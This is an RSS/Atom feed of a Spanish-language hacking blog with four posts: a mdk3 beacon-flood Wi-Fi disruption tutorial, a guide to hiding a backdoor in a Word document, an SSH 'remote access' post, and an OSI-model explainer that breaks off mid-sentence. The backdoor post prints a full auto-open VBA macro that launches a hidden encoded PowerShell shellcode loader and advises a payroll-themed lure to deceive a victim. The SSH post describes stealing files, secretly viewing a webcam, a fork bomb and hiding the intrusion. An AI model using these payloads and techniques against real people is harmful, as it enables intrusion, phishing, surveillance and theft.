<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.9.0">Jekyll</generator><link href="http://localhost:4000/feed.xml" rel="self" type="application/atom+xml" /><link href="http://localhost:4000/" rel="alternate" type="text/html" /><updated>2021-08-20T18:25:50+01:00</updated><id>http://localhost:4000/feed.xml</id><title type="html">shakar | Blog de ciberseguridad</title><subtitle>Blog personal sobre ciberseguridad y otros</subtitle><author><name>shakarr</name></author><entry><title type="html">Creando 1000+ hotsposts</title><link href="http://localhost:4000/creando-1000-hostpost/" rel="alternate" type="text/html" title="Creando 1000+ hotsposts" /><published>2021-05-26T00:00:00+01:00</published><updated>2021-05-26T00:00:00+01:00</updated><id>http://localhost:4000/creando-1000-hostpost</id><content type="html" xml:base="http://localhost:4000/creando-1000-hostpost/">&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;/assets/images/creando-1000-hostpost/mdk-feature.jpg&quot; width=&quot;50%&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;En este post vamos a tratar uno de los muchos metodos de como crear un hotspost, para esta prueba utilizaremos &lt;strong&gt;mdk3&lt;/strong&gt; y lo que haremos será un ataque &lt;strong&gt;BEACOON FLOOD&lt;/strong&gt; donde lo que tendrá por objetivo es crear un montón de puntos de acceso con el mismo nombre &lt;strong&gt;ESSID&lt;/strong&gt; que la red a la que queramos dañar pero con distinta &lt;strong&gt;MAC&lt;/strong&gt; con esto conseguirmos o bien echar a los usuarios de la red o hacer que la conexión vaya un peor.&lt;/p&gt;

&lt;p&gt;Una cosa que podemos hacer con esta herramienta es crear puntos de acceso con nombres personalizados, en nuestro caso vamos a crear alrededor de 1000 puntos de acceso con un fichero el cuál generará un ESSID ‘Wifi_Gratis’ seguido de un número al final que se irá incrementando, bien manos a la obra.&lt;/p&gt;

&lt;p&gt;Primero vamos a crear un sencillo script que haga lo de los puntos de acceso, aqui te dejo el código:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;#!/bin/bash

contador=0

until [ &quot;$contador&quot; -gt &quot;1000&quot; ]; do
    echo &quot;Wifi_Gratis$contador&quot; &amp;gt;&amp;gt; redes.txt
    let contador+=1
done
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Sencillo cierto, solo estamos haciendo un buclee que cree los 1000 puntos de acceso, les asigna el número, lo incrementa y los va guardando en un fichero llamado &lt;strong&gt;redes.txt&lt;/strong&gt; que será el que usaremos con mdk3.&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;NOTA: Acuerdate de guardarlo con extension .sh&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Si quereis podeis hacer un cat depués de haberlo ejecutado el .sh &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;./nombrefichero.sh&lt;/code&gt;(por si no te acuerdas) y os debería de salir algo como esto&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;/assets/images/creando-1000-hostpost/image1.png&quot; width=&quot;50%&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;Bien ahora solo quedaría realizar el ataque, para ello os recuerdo que tendreis que estar en modo monitos con vuestra tarjeta de red, solo tendremos que usar el siguiente comando &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sudo mdk3 wlan0mon b -f redes.txt -a -s 1000&lt;/code&gt;&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;NOTA: donde pone wlan0mon será vuestra tarjeta de red en modo monitor&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Como resultado, visto desde el movil tenemos esto&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;/assets/images/creando-1000-hostpost/imag2.png&quot; width=&quot;50%&quot; /&gt;
&lt;/p&gt;</content><author><name>shakarr</name></author><category term="Explicaciones" /><category term="Tutoriales" /><category term="Redes" /><category term="Ataques" /><category term="mdk3" /><category term="hacking" /><summary type="html">En este post te explico brevemente un ataque muy comun con mdk3 en el cual crearemos alrededor de 1000 puntos de acceso</summary></entry><entry><title type="html">Como esconder un backdoor en un documento</title><link href="http://localhost:4000/esconder-backdoor-en-documento/" rel="alternate" type="text/html" title="Como esconder un backdoor en un documento" /><published>2021-05-26T00:00:00+01:00</published><updated>2021-05-26T00:00:00+01:00</updated><id>http://localhost:4000/esconder-backdoor-en-documento</id><content type="html" xml:base="http://localhost:4000/esconder-backdoor-en-documento/">&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;/assets/images/esconder-backdoor-en-documento/man_in_doorway_newblog.png&quot; width=&quot;50%&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;En este post vamos a tratar un sencillo metodo de intrusión el cual consiste en esconde un backdoor en un documento, como puede ser word, pdf,…etc.&lt;/p&gt;

&lt;p&gt;Primero vamos a necesitar una herramienta externa desde los repositorios de github, la cual es ps1encode: &lt;strong&gt;https://github.com/CroweCybersecurity/ps1encode&lt;/strong&gt;.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;git clone https://github.com/CroweCybersecurity/ps1encode.git
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;/assets/images/esconder-backdoor-en-documento/img1.png&quot; width=&quot;100%&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;Al ejecutarlo vemos que nos muestra el modo de uso, el cual es bien sencillo, solo tenemos que pasarle los parametros necesarios, y como trabajamos con una conexión TCP debemos de pasarle el puerto y la IP origen.&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;NOTA: si quieres trabajar fuera de red local acuerdate de que tienes que abrir un puerto para tu ip pública&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;En mi caso será dentro de red local por lo que no será necesario que abra ningún puerto. La configuración quedaría tal que así:&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;/assets/images/esconder-backdoor-en-documento/img2.png&quot; width=&quot;100%&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;Vemos que en la opción &lt;strong&gt;-t&lt;/strong&gt; usaremos el encode de &lt;strong&gt;vba&lt;/strong&gt;, en otra palabras visual basic for application, que como ya sabemos es el lenguaje de macros de microsoft que se usa para programar aplicaciones windows. En cuanto presionemos enter nos saldrá un rollo como este:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Sub Auto_Open()

stringA = &quot;power&quot;
stringB = &quot;shell.exe -NoE -NoP -NonI -W Hidden -E &quot;
            
string0=&quot;JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAH&quot;
string1=&quot;MAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBj&quot;
string2=&quot;ACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALA&quot;
string3=&quot;AgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMA&quot;
string4=&quot;dABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG&quot;
string5=&quot;4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgADsAJABzAGkAegBlACAAPQAgADAAeAAxADAAMAAwADsAaQBm&quot;
string6=&quot;ACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMA&quot;
string7=&quot;A7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUA&quot;
string8=&quot;YQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC&quot;
string9=&quot;4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADEAKQApADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHgAOAA2ACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABX&quot;
string10=&quot;AGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABjAG0AZAAgAD0AIAAiAC0AbgBvAHAAIAAtAG4AbwBuAGkAIAAtAGUAbgBjACAAIgA7AGkAZQB4ACAAIgAmACAAJAB4ADgANgAgACQAYwBtAGQAIAAkAGcAcQAiAH0AZQBsAHMAZQB7ACQAYwBtAGQAIAA9ACAAIg&quot;
string11=&quot;AtAG4AbwBwACAALQBuAG8AbgBpACAALQBlAG4AYwAiADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABjAG0AZAAgACQAZwBxACIAOwB9AA==&quot;

stringFinal=stringA+stringB+string0+string1+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11

    Shell stringFinal, 0
End Sub

Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;El cual tenemos que copiar explicitamente.&lt;/p&gt;

&lt;p&gt;Bien ahora tendremos que abrir un documento word, en el cual vamos a tener que habilitar la herramienta de desarrollador, nos dirigimos a &lt;strong&gt;archivo &amp;gt; opciones &amp;gt; personalizar cinta de opciones&lt;/strong&gt; y seleccionamos desarrollador para que sea visible.&lt;/p&gt;

&lt;p&gt;Una vez que ya hemos realizado el paso anterior pinchamos en desarrollador, nos vamos a visual basic(se encuantra en la barra de herramientas superior) y pinchamos en “this document” y se nos abrirá una ventana nueva. Esta ventana tiene dos apartados, en el primero de ellos por defecto estará en general, tenemos que cambiarlo a document, y luego cambiaremos, a su derecha, la opcion a “open”.&lt;/p&gt;

&lt;p&gt;Ahora es importante eliminar todo lo que por defecto se haya escrito en la parte de debajo, borramos y pegamos lo que nos generó el ps1encode.&lt;/p&gt;

&lt;p&gt;Bueno pues echo esto ya puedes cerrar la ventana de visual basic, de vuelta en el documento word escribe lo que queiras, un proyecto, un trabajo etc…
Cuando termines es importante que lo guardes con extensión .doc, ya que esta corresponde a word 97-2003.&lt;/p&gt;

&lt;p&gt;Ya solo resta enviarlo a la víctima. Un pequeño detalle la víctima verá lo que haya en el word como si fuera un archivo corriente, pero leugo se le abrirá arriba un diálogo amarillo con lo siguiente &lt;strong&gt;“Haz click en habilitar macros para ver el contenido”&lt;/strong&gt; con el boton correspondiente alado, aqui es donde entran tus dotes de ethical hacking ya que tendras que hacer que el emnsaje que hayas escrito en el word concuerde para qu eneustra víctima no sospeche cuando le salga el mensaje, una ejemplo en empresa podría ser el siguiente:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;“Buenas tardes, aqui les adjunto los informes correspondientes a las nóminas de la semana pasada”&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Viendo este mensaje más el que le sale mencionado anteriormente la víctima creera que tendrá que activar dicha opción para visualizar el contenido, ya esto queda a vuestra manera el como hacerlo.&lt;/p&gt;</content><author><name>shakarr</name></author><category term="Intrusion" /><category term="Tutoriales" /><category term="Backdoor" /><category term="Ataques" /><category term="hacking" /><summary type="html">En este post te explico un metodo de intrusion, que consiste en esconder un backdoor en un documento</summary></entry><entry><title type="html">Conectarse a otro pc por tunelación SSH</title><link href="http://localhost:4000/tunel-ssh/" rel="alternate" type="text/html" title="Conectarse a otro pc por tunelación SSH" /><published>2021-05-25T00:00:00+01:00</published><updated>2021-05-25T00:00:00+01:00</updated><id>http://localhost:4000/tunel-ssh</id><content type="html" xml:base="http://localhost:4000/tunel-ssh/">&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;/assets/images/tunel-ssh/ssh-banner.jpeg&quot; width=&quot;50%&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;Porque voy a querer conectarme por tunelación ssh a otro PC? Pues bien quedate y verás el porque, pero antes como siempre un poco de teoría para entender el concepto.&lt;/p&gt;

&lt;p&gt;SH o Secure Shell es un protocolo el cual facilita las comunicaciones “seguras” entre dos sistemas usando una arquitectura del tipo cliente/servidor y que permite a sus usuarios conectarse a un host de manera remota. Si comparamos SSH con otros protocolos de comunicación remota tales como FTP o Telnet, SSH encripta la sesión de conexión a diferencia de estos ultimos, haciendo imposible que alguien pueda obtener contraseña encriptadas(aunque ya sabemos que nada es imposible)&lt;/p&gt;

&lt;h1 id=&quot;como-conectarme-remotamente-a-otro-ordenador&quot;&gt;¿Como conectarme remotamente a otro ordenador?&lt;/h1&gt;

&lt;p&gt;Pues bien esto es bien sencillo. Entre conexiones entre terminales linux por ejemplo, lo único que necesitamos es que el ordenador al que nos queremos conectar tenga instalado el SSH, en caso de no ser así, haremos uso del siguiente comando:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sudo apt-get install ssh
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;NOTA:&lt;/strong&gt; 
También tendras que tenerlo instalado en tu maquina, ya que mediante la instalación se nos habilita el puerto 22, el cual se encarga de realizar operaciones como SSH, SCP, SFTP&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;opción-1&quot;&gt;Opción 1&lt;/h2&gt;

&lt;p&gt;Si estamos conectados en la msima red, y hay pocos usuarios en la misma, lo único que te va a interesar saber es el nombre de usuario del sistema objetivo, sin ser necesario que conozcas su IP privada, por que te estarás preguntando, pues bien es bastante sencillo, desde la terminal podemos hacer un &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -SP 192.168.1.1-254&lt;/code&gt;, de esta manera obtendremos todas las IP privadas que el protocolo DHCP a asigando a cada uno de los usuarios de la red.&lt;/p&gt;

&lt;p&gt;Hay que tener en cuanta que la sintaxis para realizar la conexión es la siguiente &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ssh USUARIO@IPPRIVADA&lt;/code&gt;, por tanto sabiendo ya las IP con nmap, tan solo con tener el nombre de usuario podríamos ir probando con cada una de ellas. Como es evidente una vez se realice la conexión con éxito, el sistemas nos preguntará por la contraseña del equipo objetivo. Por la red encontrarás muchas maneras de como obtener contraseñas de usuarios, no obstante pronto subiré un articulo realizando esta práctica.&lt;/p&gt;

&lt;p&gt;Si la contraseña introducida es correcta, estaremos dentro del sistema y podremos ir visualizando las directorios y demás, si la contraseña es incorrecta no aparecerán notificaciones ni nada por el estilo que advierta al usuario de que alguien está intentando acceder a su equipo.&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;NOTA:&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;El usuario es capaz de saber si hay alguien coenctado a su sistema. Esto lo puede hacer haciendo uso del comandos como &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;who -q&lt;/code&gt;, que muestra el número de usuarios actuales conectados, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ps -aux grep sshd&lt;/code&gt;, esto basicamente lo que hace es listar los procesos del sistemas y hace una busqueda por el proceso SSHD que se encarga de realizar conexiones remotas, y muchos otros métodos más.&lt;/p&gt;

&lt;h2 id=&quot;opción-2&quot;&gt;Opción 2&lt;/h2&gt;

&lt;p&gt;Estando conectados a la misma red(otra vez), en caso de que querais hacer una prueba por vuestra propia cuenta, podemos usar el comando &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hostname -I&lt;/code&gt; se nos mostrará la IP privada.&lt;/p&gt;

&lt;h1 id=&quot;que-puedo-hacer-una-vez-conectado-al-ordenador-objetivo&quot;&gt;¿Que puedo hacer una vez conectado al ordenador objetivo?&lt;/h1&gt;

&lt;p&gt;Esta es la pregunta más interesante que vuestro lado pícaro os habrá formulado y creo que ya sabeis la respuesta, efectivamente la respuesta es &lt;strong&gt;TODO&lt;/strong&gt;, podemos ver sus directorios, sus ficheros, fotos, videos, proyectos y demás. Veamos algunas cositas interantes.&lt;/p&gt;

&lt;p&gt;Supongamos que la víctima tiene una carpeta de fotos y nosotros queremos “tomarlas prestadas”, pues bien esto se hace mediante &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;scp&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Suponemos la siguiente foto &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;foto.png&lt;/code&gt;, estamos ya dentro de su ordenador, queremos pasar esta foto a nuestro PC, más concretamente a nuestro escritorio, pues bien lo único que necesitamos saber es &lt;strong&gt;nuestra IP privada&lt;/strong&gt;, una ves la sepamos podemos ahcer lo siguiente: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;scp foto.png USUARIO@NUESTRAIPPRIVADA:/home/usuario/escritorio&lt;/code&gt;, siendo &lt;strong&gt;USUARIO&lt;/strong&gt; tu nombre de usuario, y siendo &lt;strong&gt;NUESTRAIPPRIVADA&lt;/strong&gt; tu IP privada, te pedirá después la pass de tu ordenador y acto seguido se procederá a la transferencia del archivo, se despierta tu curiosidad cierto, claro si eres capaz de “tomar prestado” una foto eres capaz de obtener cualquier archivo, y lo mejor es que la víctima no tendrá constancia de esto.&lt;/p&gt;

&lt;p&gt;Otra de las cosas que se pueden hacer es &lt;strong&gt;ver su cámara&lt;/strong&gt;, desactivar la luz que tiene la camara es bien sencillo, os lo dejo que lo investigueis por vuestra cuenta. Bien ponemos el supuesto de que estamos en su terminal con la conexión ya realizada, por lo que cualquier comando que escribamos afectará a su sistema. Si hacemos un &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sudo halt&lt;/code&gt; por ejemplo se le apagará el PC si confirmación ni nada por el estilo, y claro si podemos hacer esto ¿porque no podríamos instalarle algo sin que se diera cuenta?, bien vamos a instalarle el siguiente programa &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sudo apt-get install mplayer&lt;/code&gt; y una vez que esté instalado usa el siguiente comando: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;mplayer -fps 20 -cache 50 -tv driver=vl42:width=64:height=48:device=/dev/video0 tv://&lt;/code&gt;, esto te va a permitir ver su camara remotamente(obviamente se le encenderá la luz si no la habeis quitado).&lt;/p&gt;

&lt;p&gt;También podemos colapsarle el sistema haciendo uso de una llamada recursiva, para ello hacemos lo siguiente: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;colapso(){ colapso | colapso &amp;amp; }; colapso&lt;/code&gt;, si sabeís de llamadas recursivas sabreis que se está haciendo aqui si no os lo dejo para que lo investigueis.&lt;/p&gt;

&lt;p&gt;Podemos también abrir cualquier programa y ejecutar cualquier aplicación, para ello haremos antes que nada export &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;display=:0.0&lt;/code&gt;, y ya luego podemos escribir por ejemplo firefox para que se habra el navegador.&lt;/p&gt;

&lt;p&gt;También podemos mandarle mensajes por pantalla usando el siguiente comando: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;zenity --info --text=&quot;Estoy en tu sistema&quot; --display=:0&lt;/code&gt;&lt;/p&gt;

&lt;h1 id=&quot;puedo-entrar-de-manera-invisible&quot;&gt;¿Puedo entrar de manera invisible?&lt;/h1&gt;

&lt;p&gt;Claro que sí, así a la hora de realizar un escaneo no se detectará que hay alguien más en sus sistema. Esto lo podemos hacer de la siguiente manera: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ssh -t USER@HOST /bin/bash -I&lt;/code&gt;&lt;/p&gt;</content><author><name>shakarr</name></author><category term="Explicaciones" /><category term="Tutoriales" /><category term="Túneles" /><category term="SSH" /><summary type="html">En este post te explico brevemente como conectarte a otra maquina dentro de tu red vía túnel SSH y algunas cosas que puedes hacer en el ordenador objetivo</summary></entry><entry><title type="html">Explicando el modelo OSI y TCP/IP</title><link href="http://localhost:4000/explicando-el-modelo-osi/" rel="alternate" type="text/html" title="Explicando el modelo OSI y TCP/IP" /><published>2021-05-23T00:00:00+01:00</published><updated>2021-05-23T00:00:00+01:00</updated><id>http://localhost:4000/explicando-el-modelo-osi</id><content type="html" xml:base="http://localhost:4000/explicando-el-modelo-osi/">&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;/assets/images/explicacion-del-modelo-osi/osi-image-1.jpg&quot; width=&quot;50%&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;Entender como funciona la red es algo muy importante para cualquier informático que se precie, pues bien aquí aprenderas los conocimientos básicos sobre el tema.&lt;/p&gt;

&lt;h1 id=&quot;el-modelo-osi&quot;&gt;El modelo OSI&lt;/h1&gt;

&lt;p&gt;El modelo OSI (Open Systems Interconnection), traducido del ingles, &lt;strong&gt;sistemas abiertos de interconección&lt;/strong&gt;, es un modelo estandarizado que se usa para demostrar la teoría que hay detrás de las redes de ordenadores. En la práctica, es decir en el mundo real se usa el modelo TCP/IP ya que es más compacto y más fácil obtener una comprensión inicial sobre el modelo OSI&lt;/p&gt;

&lt;p&gt;El modelo OSI consta de siete capas:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Aplicacion&lt;/li&gt;
  &lt;li&gt;Presentación&lt;/li&gt;
  &lt;li&gt;Sesión&lt;/li&gt;
  &lt;li&gt;Transporte&lt;/li&gt;
  &lt;li&gt;Red&lt;/li&gt;
  &lt;li&gt;Enlace&lt;/li&gt;
  &lt;li&gt;Física&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Así a simple vista parece un tostón aprenderselos todos, pero hay muchos memónicos que te pueden ayudar a memorizarlo.&lt;/p&gt;

&lt;p&gt;Uno podría ser este:&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;A&lt;/strong&gt;nxious &lt;strong&gt;P&lt;/strong&gt;ale &lt;strong&gt;S&lt;/strong&gt;hakespeare &lt;strong&gt;T&lt;/strong&gt;reated &lt;strong&gt;N&lt;/strong&gt;ervous &lt;strong&gt;D&lt;/strong&gt;runks &lt;strong&gt;P&lt;/strong&gt;atiently&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Bien una vez que hemos visto un poco por encima cuantas capas lo componen, vamos a ver más en profundidad que hace cada capa.&lt;/p&gt;

&lt;h2 id=&quot;capa-7---aplicación&quot;&gt;Capa 7 - Aplicación&lt;/h2&gt;

&lt;p&gt;La capa de aplicación del modelo OSI esencialmente proporciona opciones de red a los
programas que se ejecutan en un ordenador. Funciona casi exclusivamente con
aplicaciones, proporcionando una interfaz que pueden utilizar para transmitir datos.
Cuando los datos se entregan a la capa de aplicación, se transmiten a la capa de
presentación.&lt;/p&gt;

&lt;h2 id=&quot;capa-6---presentación&quot;&gt;Capa 6 - Presentación&lt;/h2&gt;

&lt;p&gt;La capa de presentación recibe datos de la capa de aplicación. Estos datos tienden a
estar en un formato que la aplicación comprende, pero no necesariamente en un formato
estandarizado que pueda ser entendido por la capa de aplicación en el ordenador
receptor. La capa de presentación traduce los datos a un formato estandarizado,
además de manejar cualquier cifrado, compresión u otras transformaciones de los datos.
Con esto completo, los datos se pasan a la capa de sesión.&lt;/p&gt;

&lt;h2 id=&quot;capa-5---sesión&quot;&gt;Capa 5 - Sesión&lt;/h2&gt;

&lt;p&gt;Cuando la capa de sesión recibe los datos con el formato correcto de la capa de
presentación, busca si puede establecer una conexión con el otro ordenador a través
de la red. Si no puede, envía un error y el proceso no continúa. Si se puede establecer
una sesión, entonces es el trabajo de la capa de sesión mantenerla, así como cooperar
con la capa de sesión de la PC remota para sincronizar las comunicaciones. La
capa de sesión es particularmente importante ya que la sesión que crea es única para la
comunicación en cuestión. Esto es lo que le permite realizar múltiples solicitudes a
diferentes puntos finales simultáneamente sin que se mezclen todos los datos (piense en
abrir dos pestañas en un navegador web al mismo tiempo). Cuando la capa de sesión ha
registrado con éxito una conexión entre el host y la PC remota, los datos se
transmiten a la Capa 4: la Capa de transporte.&lt;/p&gt;

&lt;h2 id=&quot;capa-4---transporte&quot;&gt;Capa 4 - Transporte&lt;/h2&gt;

&lt;p&gt;La capa de transporte es una capa muy interesante que cumple numerosas funciones
importantes. Su primer propósito es elegir el protocolo por el que se transmitirán los datos.
Los dos protocolos más comunes en la capa de transporte son TCP (Protocolo de control
de transmisión) y UDP (Protocolo de datagramas de usuario); con TCP, la transmisión se
basa en la conexión, lo que significa que se establece y se mantiene una conexión entre
los ordenadores durante la duración de la solicitud. Esto permite una transmisión
confiable, ya que la conexión se puede utilizar para garantizar que todos los paquetes
lleguen al lugar correcto. Una conexión TCP permite que los dos ordenadores
permanezcan en comunicación constante para garantizar que los datos se envíen a una
velocidad aceptable y que los datos perdidos se reenvíen. Con UDP, ocurre lo contrario;
Los paquetes de datos se lanzan esencialmente a la PC receptora; si no puede
mantener el ritmo, ese es su problema (es por eso que una transmisión de video a través
de algo como Skype se puede pixelar si la conexión es mala). Lo que esto significa es que
normalmente se elegiría TCP para situaciones en las que se favorece la precisión sobre la
velocidad (por ejemplo, transferencia de archivos o carga de una página web), y UDP se
usaría en situaciones donde la velocidad es más importante (por ejemplo, transmisión de
video).Con un protocolo seleccionado, la capa de transporte luego divide la transmisión en 
partes del tamaño de un bocado (a través de TCP se les llama segmentos, a través de 
UDP se les llama datagramas), lo que facilita la transmisión del mensaje con éxito.&lt;/p&gt;

&lt;h2 id=&quot;capa-3---red&quot;&gt;Capa 3 - Red&lt;/h2&gt;

&lt;p&gt;La capa de red se encarga de localizar el destino de su solicitud. Por ejemplo, Internet es
una red enorme; cuando desea solicitar información de una página web, es la capa de red
la que toma la dirección IP de la página y determina la mejor ruta a seguir. En esta etapa,
estamos trabajando con lo que se conoce como direccionamiento lógico (es decir,
direcciones IP) que todavía están controladas por software. Las direcciones lógicas se
